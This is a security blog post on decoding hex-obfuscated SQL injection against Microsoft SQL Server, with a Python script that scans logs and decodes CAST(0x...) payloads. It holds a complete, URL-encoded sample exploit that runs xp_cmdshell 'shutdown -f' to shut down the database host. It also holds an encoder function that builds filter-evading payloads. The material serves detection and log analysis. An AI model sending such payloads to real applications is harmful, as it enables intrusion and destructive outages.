decoding sql injection attempts


SQL Server's CAST function converts a value from one data type to another. Applied to a binary literal written in hex (0x...), it turns the raw bytes back into text, so CAST(0x... AS NVARCHAR(4000)) rebuilds a string from its hex-encoded bytes. Attackers use this to obfuscate a SQL injection payload: the request carries nothing but hex digits, so filters that block SQL keywords or hazardous characters such as quotes see nothing to block, and the server reconstructs the command for them.
Here is the shape of an attack that uses this technique (the hex literal stands in for the encoded payload):

DECLARE @S NVARCHAR(4000);
SET @S=CAST(0x<hex-encoded payload> AS NVARCHAR(4000));
EXEC(@S);

The first step declares a variable that will hold the attack payload.
The second step sets the variable to the payload: the SQL text is supplied as a hex-encoded binary literal and decoded back to text by CAST. Because the target type is NVARCHAR, the bytes are UTF-16LE, which is why every ASCII byte in such a literal is followed by 00.
In the third step the payload is executed with EXEC; the SQL keywords never appeared in readable form in the request.

Sample Exploit

The following payload shuts down the host running the database server by executing the command exec master..xp_cmdshell 'shutdown -f' (this only works if xp_cmdshell is enabled, which it is not by default since SQL Server 2005, and if the application's login has the rights to call it):

';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x650078006500630020006D00610073007400650072002E002E00780070005F0063006D0064007300680065006C006C0020002700730068007500740064006F0077006E0020002D0066002700%20AS%20NVARCHAR(4000));EXEC(@S);

Affected Products
Web applications backed by Microsoft SQL Server.

Let’s start decoding sql injection attempts



To Decode (on Linux)

Drop the 0x prefix (it is not hex) and feed the digits to xxd in reverse plain-hexdump mode, which turns the hex back into raw bytes:

# echo "650078006500630020006D00610073007400650072002E002E00780070005F0063006D0064007300680065006C006C0020002700730068007500740064006F0077006E0020002D0066002700" | xxd -r -p

This yields our payload:

exec master..xp_cmdshell 'shutdown -f'

One caveat: because the attacker cast the bytes to NVARCHAR, they are UTF-16LE, so every character in the output is followed by a NUL byte. The terminal hides the NULs, but a grep or a string comparison against the decoded text will not match until you convert it, for example by piping the xxd output through iconv -f UTF-16LE -t UTF-8 (or simply tr -d '\0').
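The xxd one-liner handles one hex blob pasted by hand. The script below is an added example (not code from the original post) that generalizes both halves of the page: encode_payload builds the CAST(0x... AS NVARCHAR/CHAR) expression the way the attack template above does, and decode_attempt URL-decodes a raw request, finds every CAST(0x...) literal in it and decodes the hex with the width the CAST target implies (UTF-16LE for NVARCHAR/NCHAR, single-byte for CHAR/VARCHAR), so the NUL bytes never get in the way. The regex, the function names and the access-log lines are my own constructions; SAMPLE_REQUEST is the exploit string from this page.

```python
"""Find and decode CAST(0x...) obfuscated MSSQL injection payloads.

Added example, not code from the original post. The regex, the helper names
and the sample log lines are assumptions made for this illustration.
"""
import re
from typing import List, Tuple
from urllib.parse import unquote

# CAST(0x<hex> AS <type>[(<len>)]) -- the target type decides the text width:
# NVARCHAR/NCHAR hold UTF-16LE (two bytes per character, hence the 00 after
# every ASCII byte in the page's payload), CHAR/VARCHAR hold single-byte text.
CAST_RE = re.compile(
    r"CAST\s*\(\s*0x([0-9a-f]+)\s+AS\s+(N?(?:VAR)?CHAR)"
    r"\s*(?:\(\s*(?:\d+|MAX)\s*\))?\s*\)",
    re.IGNORECASE,
)

# The exploit string from the page, still URL-encoded as it would arrive in
# a web-server log.
SAMPLE_REQUEST = (
    "';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x"
    "650078006500630020006D00610073007400650072002E002E00780070005F00"
    "63006D0064007300680065006C006C0020002700730068007500740064006F00"
    "77006E0020002D0066002700"
    "%20AS%20NVARCHAR(4000));EXEC(@S);"
)


def encode_payload(sql: str, unicode_type: bool = True) -> str:
    """Build the obfuscated CAST(...) an attacker would embed in place of `sql`.

    unicode_type=True mirrors the page's exploit (UTF-16LE into NVARCHAR);
    False produces the single-byte CHAR variant of the template.
    """
    if unicode_type:
        raw, target = sql.encode("utf-16-le"), "NVARCHAR(4000)"
    else:
        raw, target = sql.encode("latin-1"), "CHAR(4000)"
    return f"CAST(0x{raw.hex().upper()} AS {target})"


def decode_hex(hexdigits: str, target_type: str) -> str:
    """Turn the hex literal back into text using the CAST target's width."""
    if len(hexdigits) % 2:
        # SQL Server reads an odd-length binary literal with a leading zero
        # nibble (0xF is 0x0F), so pad the same way before converting.
        hexdigits = "0" + hexdigits
    raw = bytes.fromhex(hexdigits)
    if target_type.upper().startswith("N"):
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")


def decode_attempt(request: str) -> List[str]:
    """URL-decode a raw request and return every CAST payload it hides."""
    plain = unquote(request)
    return [decode_hex(h, t) for h, t in CAST_RE.findall(plain)]


def scan_log(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line_number, decoded_payload) for each CAST hit in a log."""
    hits = []
    for number, line in enumerate(lines, start=1):
        for payload in decode_attempt(line):
            hits.append((number, payload))
    return hits


# Constructed access-log lines (not from the page): a benign request and one
# carrying SAMPLE_REQUEST in its query string.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Mar/2010:10:14:01 +0000] "GET /products.asp?id=42 HTTP/1.1" 200 5123',
    '10.0.0.9 - - [12/Mar/2010:10:14:07 +0000] "GET /products.asp?id=42'
    + SAMPLE_REQUEST + ' HTTP/1.1" 500 310',
]

if __name__ == "__main__":
    for number, payload in scan_log(SAMPLE_LOG):
        print(f"line {number}: {payload}")
    # The encoder round-trips through the decoder for both target widths.
    print(decode_attempt(encode_payload("waitfor delay '0:0:5'"))[0])
    print(decode_attempt(encode_payload("select 1", unicode_type=False))[0])
```

Run it against a real access log by replacing SAMPLE_LOG with the file's lines; because decode_attempt works on the URL-decoded text, it also catches variants where the attacker percent-encodes the CAST keyword or the parentheses themselves.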
